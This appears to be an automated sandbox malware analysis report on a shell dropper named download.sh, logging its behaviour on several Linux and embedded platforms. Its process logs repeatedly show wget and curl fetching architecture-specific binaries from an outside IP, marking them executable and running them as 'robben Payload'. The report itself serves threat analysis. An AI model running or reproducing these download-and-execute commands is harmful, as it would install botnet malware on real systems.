Malware Analysis Report

2025-01-23 15:24

Sample ID 240822-1l9gmasbjn
Target download.sh
SHA256 19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Tags
antivm
score
7/10


Analysis Overview

score
7/10

SHA256

19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902

Threat Level: Shows suspicious behavior

The file download.sh was found to show suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK: Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-08-22 21:45

Signatures

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

ubuntu2004-amd64-20240611-en

Max time kernel

133s

Max time network

183s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description                  Indicator                      Process           Target
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A

Writes file to tmp directory

Description                  Indicator                      Process           Target
File opened for modification /tmp/robben                    /tmp/download.sh  N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]

/tmp/robben

[./robben Payload]

Network

Country  Destination           Domain                          Proto
N/A      224.0.0.251:5353      -                               udp
US       158.51.127.106:80     -                               tcp
US       1.1.1.1:53            connectivity-check.ubuntu.com   udp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       1.1.1.1:53            connectivity-check.ubuntu.com   udp
US       1.1.1.1:53            connectivity-check.ubuntu.com   udp
GB       185.125.190.96:80     connectivity-check.ubuntu.com   tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

debian12-armhf-20240221-en

Max time kernel

280s

Max time network

325s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description                  Indicator                      Process           Target
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A

Checks CPU configuration

antivm

Description                  Indicator                      Process           Target
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A

Writes file to tmp directory

Description                  Indicator                      Process           Target
File opened for modification /tmp/robben                    /tmp/download.sh  N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]

/tmp/robben

[./robben Payload]

Network

Country  Destination           Domain                          Proto
US       158.51.127.106:80     -                               tcp
US       1.1.1.1:53            debian12-armhf-20240221-en-12   udp
US       1.1.1.1:53            debian12-armhf-20240221-en-12   udp
US       1.1.1.1:53            debian12-armhf-20240221-en-12   udp
US       1.1.1.1:53            debian12-armhf-20240221-en-12   udp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

debian12-mipsel-20240221-en

Max time kernel

300s

Max time network

304s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description                  Indicator                      Process           Target
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A

Writes file to tmp directory

Description                  Indicator                      Process           Target
File opened for modification /tmp/robben                    /tmp/download.sh  N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-8aaf9894ee06476383bd6e60f2d5c264-systemd-logind.service-jplWFO]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-8aaf9894ee06476383bd6e60f2d5c264-systemd-logind.service-jplWFO]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

Network

Country  Destination           Domain                          Proto
US       158.51.127.106:80     -                               tcp
US       1.1.1.1:53            debian12-mipsel-20240221-en-8   udp
US       1.1.1.1:53            debian12-mipsel-20240221-en-8   udp
US       1.1.1.1:53            debian12-mipsel-20240221-en-8   udp
US       1.1.1.1:53            debian12-mipsel-20240221-en-8   udp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

debian9-armhf-20240611-en

Max time kernel

248s

Max time network

281s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description                  Indicator                      Process           Target
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A

Checks CPU configuration

antivm

Description                  Indicator                      Process           Target
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A
File opened for reading      /proc/cpuinfo                  /usr/bin/curl     N/A

Reads runtime system information

Description                  Indicator                      Process           Target
File opened for reading      /proc/sys/crypto/fips_enabled  /usr/bin/curl     N/A
File opened for reading      /proc/self/auxv                /usr/bin/curl     N/A
File opened for reading      /proc/sys/crypto/fips_enabled  /usr/bin/curl     N/A
File opened for reading      /proc/self/auxv                /usr/bin/curl     N/A
File opened for reading      /proc/sys/crypto/fips_enabled  /usr/bin/curl     N/A
File opened for reading      /proc/self/auxv                /usr/bin/curl     N/A
File opened for reading      /proc/self/auxv                /usr/bin/curl     N/A
File opened for reading      /proc/sys/crypto/fips_enabled  /usr/bin/curl     N/A
File opened for reading      /proc/self/auxv                /usr/bin/curl     N/A
File opened for reading      /proc/sys/crypto/fips_enabled  /usr/bin/curl     N/A

Writes file to tmp directory

Description                  Indicator                      Process           Target
File opened for modification /tmp/robben                    /tmp/download.sh  N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

Network

Country  Destination           Domain                          Proto
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

299s

Max time network

300s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description                  Indicator                      Process           Target
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A

Writes file to tmp directory

Description                  Indicator                      Process           Target
File opened for modification /tmp/robben                    /tmp/download.sh  N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-timedated.service-NrPp8B]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-timedated.service-NrPp8B]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

Network

Country  Destination           Domain                          Proto
US       158.51.127.106:80     -                               tcp
US       151.101.193.91:443    -                               tcp
N/A      224.0.0.251:5353      -                               udp
GB       185.125.188.62:443    -                               tcp
GB       185.125.188.62:443    -                               tcp
US       151.101.193.91:443    -                               tcp
GB       89.187.167.9:443      -                               tcp
US       1.1.1.1:53            1527653184.rsc.cdn77.org        udp
US       1.1.1.1:53            1527653184.rsc.cdn77.org        udp
GB       89.187.167.38:443     1527653184.rsc.cdn77.org        tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       1.1.1.1:53            connectivity-check.ubuntu.com   udp
US       1.1.1.1:53            connectivity-check.ubuntu.com   udp
GB       185.125.190.97:80     connectivity-check.ubuntu.com   tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp
US       158.51.127.106:80     -                               tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-22 21:45

Reported

